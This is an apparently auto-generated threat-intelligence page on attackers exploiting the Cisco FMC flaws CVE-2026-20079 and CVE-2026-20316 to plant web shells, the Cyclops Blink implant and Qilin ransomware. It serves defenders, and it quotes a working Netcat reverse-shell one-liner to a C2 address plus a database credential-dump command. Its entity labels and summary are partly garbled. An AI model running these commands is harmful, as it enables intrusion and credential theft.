INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Cisco FMC Vulnerabilities Exploited for Credential Theft and Ransomware
| 2026-09-11 06:19 CRITICAL HIGHExecutive Summary AI-generated
The threat cluster linked to Cisco's FMC vulnerabilities has been identified as a distinct attack vector, leveraging two recently patched Secure Firewall Management Center (FMC) vulnerabilities. This cluster is comprised of three separate incidents: UAT-12197 and UAT-11823, which exploited CVE-2026-20079 for authentication bypass and Netcat-based reverse shell delivery; UAT-11988, a ransomware operation that used legitimate FMC tooling as part of a living-off-the-land attack. The attacks also involved the exploitation of CVE-2026-20316, allowing an unauthenticated remote attacker to log in using a low-privilege account and access sensitive data within susceptible systems. As a result, Cisco has revealed that three distinct threat clusters linked to ransomware and state-sponsored attacks have been exploiting these vulnerabilities since September 11, 2026.
Technical Mitigations AI-generated
* Apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316 to prevent exploitation of the identified vulnerabilities.
* Implement a secure patch management strategy to ensure timely deployment of security patches, including regular updates and monitoring for potential exploits.
* Conduct thorough risk assessments and vulnerability scans on network devices and systems to identify potential entry points for attackers exploiting known vulnerabilities like CVE-2026-20079 and CVE-2026-20316.
* Use intrusion detection and prevention systems (IDPS) with robust signature-based or behavioral analysis capabilities to detect and block suspicious activity related to the identified vulnerabilities.
* Implement a secure configuration management process to ensure that Cisco Secure FMC software is properly configured, patched, and maintained on all affected devices.
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
QilinQilinCyclops BlinkCyclops Blink
CVE-2026-20316CVE-2026-20316
CVE-2026-20079CVE-2026-20079
Target & Sectors
Global Scope
Incident Timeline
late July 2026
The CVE-2026-20316 vulnerability was added to the KEV catalog in late July 2026, allowing threat actors to exploit it on Cisco FMC systems.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-20316
The second vulnerability, CVE-2026-20316, was
added
to the KEV catalog in late July 2026.
organisation
KEV
The second vulnerability, CVE-2026-20316, was
added
to the KEV catalog in late July 2026.
Sep 11, 2026
Threat actors used the Cisco FMC web interface authentication bypass vulnerability (CVE-2026-20079) to log in and access sensitive data on affected devices.
Click on any entity below to view its context and source!
infrastructure
10.0
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
organisation
FMC
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
organisation
Cisco
"Customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316," Cisco said, adding it intends to ship a comprehensive hardening release for various internally discovered vulnerabilities next week.
organisation
Cisco Secure FMC
It can be paired with other Cisco Secure FMC vulnerabilities to elevate privileges.
2026/09/11
UAT-11823 exploited CVE-2026-20316 to gain initial access, then used the JAR-based command executor (cmd[.]jar) to query internal databases for user authentication data and credentials.
Click on any entity below to view its context and source!
organisation
Sandworm
The second intrusion cluster, which we attribute to UAT-11823, consisted of the exploitation of CVE-2026-20079 and CVE-2026-20316, leading to the deployment of a Netcat-based reverse shell and proxy tooling, ultimately leading to the deployment of a variant of the
Cyclops Blink
malware, previously attributed to the Russian APT
Sandworm by the United States and United Kingdom
.
organisation
Russian
APT
The ELF-based implant is
Cyclops Blink
, a malware family previously attributed to
Sandworm,
a
Russian
APT actor.
organisation
Cisco FMC Flaws Exploited
Cisco FMC Flaws Exploited to Steal Credentials and Deploy Qilin Ransomware.
organisation
FMC
Talos is further disclosing a third cluster of malicious activity on an FMC instance, attributed to UAT-11988, who we assess with high confidence is a ransomware operator.
financial
3 Cluster
Cluster #3: UAT-11988, a Qilin ransomware operator
A third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (
CVE-2026-20316
), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption.
organisation
AV
Once all these preliminary actions were completed, the operator began conducting additional probes within the compromised network, deploying antivirus (AV) killers and ultimately the Qilin ransomware family.
organisation
Invoke-TheHash
Pre-ransomware actions and ransomware deployment
The threat actor conducted extensive probing of endpoints in the victim’s environment, deployed open-source tooling such as impacket, Invoke-TheHash, and custom-made AV killers — all followed by the deployment of the Qilin ransomware on selected endpoints.
organisation
LOTL
The preliminary stages of the attack entailed the threat actor gaining access to the system via static credentials (
CVE-2026-20316)
and then abusing legitimate built-in FMC tooling in living-off-the-land (LOTL) fashion to conduct extensive reconnaissance of the victim’s environment, deploy tunneling tools to maintain network access, harvest credentials, and build a target list of endpoints to encrypt/lock.
organisation
IP
The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.
organisation
Hostname
The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.
organisation
ADFS
The malicious file consisted of commands to run on the system to conduct extensive reconnaissance in the victim organization’s environment:
Host names, IP addresses, directory listings
Active Directory (AD) service-accounts credentials, MySQL account credentials
Domain account information exfiltration
Computer object lists
Hostname to IP mappings spanning domain controllers, ADFS, exchanges, file servers, database servers, etc.
organisation
Cisco’s Secure FMC
First,
CVE-2026-20079
is an authentication bypass vulnerability in unpatched instances of Cisco’s Secure FMC Software, which allows an unauthenticated, remote attacker to bypass authentications and execute scripts on impacted devices to obtain root access to the underlying operating system.
organisation
CVSS
CVE-2026-20079 is a critical vulnerability with a CVSS score of 10.0.
financial
1 Cluster
Cluster #1: UAT-12197
This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory.
organisation
Attacker
104.218.165[.]253
UAT-11823
Attacker’s
vulnerability scanner for CVE-2026-20079.
organisation
Cisco Secure FMC
CVE-2026-20316 has a CVSS score of 5.3, however it can be used with other Cisco Secure FMC vulnerabilities to elevate privileges.
organisation
Modular
Modular ELF implant: Cyclops Blink
organisation
DNS
This variant of Cyclops Blink consists of the following capabilities:
Establish persistence scripts in /etc/init.d/ that execute the implant
DNS over HTTPS (DoH) IP resolution
File administration including downloads and uploads
Credential harvesting
Arbitrary file and command execution on the compromised system
Network scanning and discovery
Packet sniffing (with option filters)
organisation
HTTPS (DoH
This variant of Cyclops Blink consists of the following capabilities:
Establish persistence scripts in /etc/init.d/ that execute the implant
DNS over HTTPS (DoH) IP resolution
File administration including downloads and uploads
Credential harvesting
Arbitrary file and command execution on the compromised system
Network scanning and discovery
Packet sniffing (with option filters)
organisation
Secure Firewall Management Center
Cisco Talos is actively tracking the exploitation of two vulnerabilities in Cisco’s Secure Firewall Management Center (FMC) Software.
organisation
users;\
The threat actors used the JAR file (named “cmd[.]jar”) to query the compromised systems’ internal databases to obtain user authentication data and credentials:
/var/jre/bin/java -jar cmd.jar '/var/sf/bin/OmniQuery.pl -db mdb -e \'SELECT name, auth_data FROM users;\''
The JAR file is basically a command executor that obtains the command to be executed from its command line and executes it using /bin/sh -c <command>.
organisation
Makeself
After obtaining access, UAT-11823 subsequently updated the “license.tmp” file on disk (using Makeself) with a malicious copy to establish a Netcat-based reverse shell to their own command-and-control (C2) server:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 208[.]123[.]119[.]215 3090 >/tmp/f
organisation
UAT-12197
cmd[.]jar
Db491181ece3f319de6567ab6f6daa90c6879911cd890155e6b7d8cc7a1a8c8e
UAT-12197
cmd[.]jar –
JAR-based command executor.
organisation
Cisco Secure Firewall Management Center
Active exploitation of Cisco Secure Firewall Management Center vulnerabilities.
organisation
JSP
The web shell is JSP-based and Base64 decodes a parameter labelled “F6C1F0E7”, consisting of the class name to load in the JAVA process:
The web shell was used to place a malicious JAR file in the same directory.
organisation
JAR
The web shell is JSP-based and Base64 decodes a parameter labelled “F6C1F0E7”, consisting of the class name to load in the JAVA process:
The web shell was used to place a malicious JAR file in the same directory.
organisation
APT
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
financial
2 Cluster
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
organisation
Sandworm
APT
UAT-11823 overlaps in tooling with the
Sandworm
APT actor.
organisation
ELF
The threat actors downloaded a modular ELF implant from one of their Netcat C2 servers.
organisation
SSH
The threat actor also staged a SOCKS proxy and reverse-SSH tunnel to forward ports from internal hosts back to their own infrastructure.
organisation
license[.]tmp
Instrumenting operations via package_info.pl
After successfully accessing the device, the threat actor abused the legitimate utility “package_info.pl” to execute an attacker-crafted malicious “license[.]tmp” file with root privileges.
organisation
SMB
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
organisation
NETBIOS
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
data_breach
445 SMB
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
data_breach
135 NETBIOS
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
organisation
TAC
Customer support is also available by initiating a
TAC request
.
organisation
Attacker IP
43.204.2[.]142
UAT-11988
Attacker IP
address used to conduct intrusions.
September 12, 2026
Threat actors exploited CVE-2026-20079 in Cisco FMC to steal credentials and deployed Qilin Ransomware.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-20079
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
Known Exploited
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
tactic
T1588.006 - Vulnerabilities
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
KEV
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
Federal Civilian Executive Branch
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
attribution
FCEB
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
CVE-2026-20079 to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the patches by September 12, 2026.
Week of September 14th
Threat actors exploited known vulnerabilities in Cisco FMC to gain unauthorized access and steal credentials.
Week of September 16th
Threat actors exploited known vulnerabilities in Cisco FMC to gain unauthorized access and deploy Qilin Ransomware.
Tactical Metrics
Metrics
infrastructure
10.0
Software Version
Click for context!
The attacks leverage
CVE-2026-20079
(CVSS score: 10.0), an authentication bypass vulnerability in the web interface of FMC software that could allow an unauthenticated, remote attacker to bypass authentication and execute script files on an affected device to obtain root access to the underlying operating system.
Metrics
financial
3
Cluster
Cluster #3: UAT-11988, a Qilin ransomware operator
A third cluster of activity entailed a ransomware operator (tracked as UAT-11988) logging into an FMC device with static credentials (
CVE-2026-20316
), performing extensive reconnaissance, domain enumerations, credential theft, and building a list of target endpoints within the compromised organization for encryption.
Metrics
financial
1
Cluster
Cluster #1: UAT-12197
This cluster of activity involved the successful exploitation of CVE-2026-20079 and the subsequent placement of a malicious web shell in the CSM Tomcat webroot directory.
Metrics
financial
2
Cluster
Cluster #2: UAT-11823
Talos attributes this cluster of activity to UAT-11823, an advanced persistent threat (APT) actor, with high confidence.
Metrics
data_breach
445
Smb
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
Metrics
data_breach
135
Netbios
The following ports were forwarded: LDPA (389), LDAPS (636), Kerberos (88), SMB (445), NETBIOS (135), and WinRM (5985).
Intelligence Sources
Talos Intelligence
2026-09-09
The Hacker News
2026-09-11
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-09-11T10:30
Comprehensive Tactical Telemetry
Highly Correlated Entities
35x
organisation
Identified Entity
Cisco FMC Flaws Exploited
entity
10x
attribution
Attributing Entity
JSP
authority
8x
timeline
Temporal Reference
2026
date
5x
tactic
MITRE ATT&CK Technique
T1589.001 - Credentials
technique
3x
source region
Origin Country
Russian Federation
country
3x
tactic
Cyber Operation Type
Ransomware
tactic
3x
financial
Cluster
3
cluster
2x
vulnerability
Exploited CVE
CVE-2026-20079
cve
2x
malware
Malware Payload
Cyclops Blink
tool
2x
vulnerability
CVSS Score
10
score
Contextual Telemetry
Context Block
10 METRICS
general metric
Java Archive
20,316
java archive
general metric
Sep
11
sep
infrastructure
Software Version
10.0
version
general metric
Cve-2026
20,079
cve-2026
general metric
F|/Bin
3,090
f|/bin
general metric
Ldpa
389
ldpa
general metric
Ldaps
636
ldaps
general metric
Kerberos
88
kerberos
data breach
Smb
445
smb
data breach
Netbios
135
netbios
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.